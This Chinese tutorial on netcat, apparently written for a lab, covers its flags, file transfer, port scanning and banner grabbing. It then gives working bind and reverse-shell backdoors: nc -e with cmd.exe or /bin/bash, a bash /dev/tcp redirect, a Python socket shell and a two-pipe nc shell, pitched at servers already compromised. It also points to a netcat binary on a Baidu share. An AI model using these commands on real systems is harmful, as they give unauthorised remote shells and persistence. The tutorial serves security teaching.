本文主要是介绍网络瑞士军刀netcat,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
netcat是什么?
Netcat是一款非常出名的网络工具,有瑞士军刀之称。它虽然体积小,但是在网络中无比强大,它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。
如何下载
kali自带netcat,直接使用即可,windows下载
链接:https://pan.baidu.com/s/1MmAStRA2WCfQ5arR4HBsHQ
提取码:zjvj
下载压缩包后解压即可(32位和64位分清使用)
本次实验中windows的ip为192.168.1.218
kali的ip为192.168.65.132
nc的控制参数
参数 | 简介 |
---|---|
-l | 设置nc处于监状态,此时nc当做服务端,监听并等待连接 |
-L | 和-l相似,当客户端断开时,服务端回到等待状态 |
-p | 设置监听端口 |
-u | nc使用UDP协议,默认使用TCP协议 |
-w | 后面跟数字,超时断开 |
-z | 表示zero,扫描时不发送任何数据,加快扫描速度 |
-n | 设置nc只识别ip地址,不进行dns解析 |
-v | 输出交互或出错信息 |
-s | 指定发送数据的源ip,适用于多网卡机 |
-d | 脱离命令窗口,在后台运行(关闭终端,仍可运行) |
-e | 执行某个程序 |
-i | 设置发送每行数据的时间间隔 |
可使用nc -h查看帮助信息:
基本使用
1、通信
服务端开启监听:nc -l -p localport
客户端连接: nc remoteip remoteport
此时两台机器可进行简单通信功能
2、文件传输
为什么可以直接利用nc进行文件传输?
nc中的数据传输,使用的是标准的输入、输出流,所以可以直接利用命令来进行操作。
文件传输的使用场景
1、取证:当目标机器被黑客攻击后,取证人员可以利用nc的文件传输功能来获取目标机器的文件内容,避免直接在目标机器上进行操作造成取证的误差。
2、单纯获取目标机敏感文件,当目标机上有的文件内容无法正常下载,可以使用nc进行文件的传输。
客户端发送文件给服务端
服务端:nc -l -p localport > acceptfile
客户端: nc remoteip remoteport < sendfile
服务端发送文件给客户端
服务端:nc -l -p localport < sendfile
客户端: nc remoteip remoteport > acceptfile
3、信息探测
信息探测的使用场景
1、目标内网的扫描
当获取目标权限之后,如果目标没有任何途径可以对内网进行探测,但此时有一个nc,就可以使用nc对内网的ip和端口进行扫描。
2、当手头没有探测工具时,可以使用nc进行端口探测
3、对目标的服务banner进行抓取,通过nc对目标端口进行探测。
端口扫描
nc -n -v -w1 -z target_ip start_target_port- stop_target_port
Banner抓取
echo " "| nc -v -n -w1 target_ip start_target_port- stop_target_port
4、建立后门
建立后门的使用场景
当目标机器上有nc时,可以使用nc来建立后门,实现执行目标命令的功能。
windows监听型后门
有客户端连接该端口时,返回cmd给客户端 nc -l -p port -e cmd.exe
出现乱码,输入chcp 65001 消除乱码
服务端: nc -l -p 9999 -e cmd.exe
客户端:nc64.exe 192.168.1.218 9999
此时客户端获取服务端cmd
windows连接型后门
连接的客户端返回给服务器cmd nc ip port -e cmd.exe
服务端: nc -l -p 9999
客户端:nc64.exe 192.168.65.132 9999 -e cmd.exe
此时客户端将cmd.exe发给服务端,服务端可以使用cmd命令
linux监听型后门
nc -l -p port -e /bin/bash
服务端: nc -l -p 9999 -e /bin/bash
客户端:nc64.exe 192.168.65.132 9999
linux连接型后门
nc ip port -e /bin/bash
服务端: nc64.exe -l -p 9999
客户端:nc 192.168.1.218 9999 -e /bin/bash
5、连接转发
现需要kali1和kali2互通,解决方法:
1、kali2开启监听: nc -l -p 9999
2、windows 开启监听: nc64.exe -l -p 9998 -e qwe.bat
其中qwe.bat的文件内容为: nc64.exe 192.168.65.132 9999
3、kali1连接windows,执行qwe.bat,再次连接kali2,此时kali1和kali2建立连接,可以发送请求。
6、反弹shell
bash
场景:拿到某服务器权限,想反弹shell,但服务器未安装nc。
反弹shell命令: bash -i >& /dev/tcp/ip/port 0>&1
接受命令: nc -lvp port
python
场景:拿到某服务器权限,想反弹shell。服务器未安装nc,但安装了python。
反弹shell命令:
import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
接受命令: nc -lvp port
bash
场景:拿到某服务器权限,想反弹shell。服务器不支持-e参数。
反弹shell命令: nc ip port | /bin/bash | nc ip port
接受命令(开启两个监听端口): nc -lvp port1 nc -lvp port1
完成后在port1输入命令,port2执行并返回结果
这篇关于网络瑞士军刀netcat的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!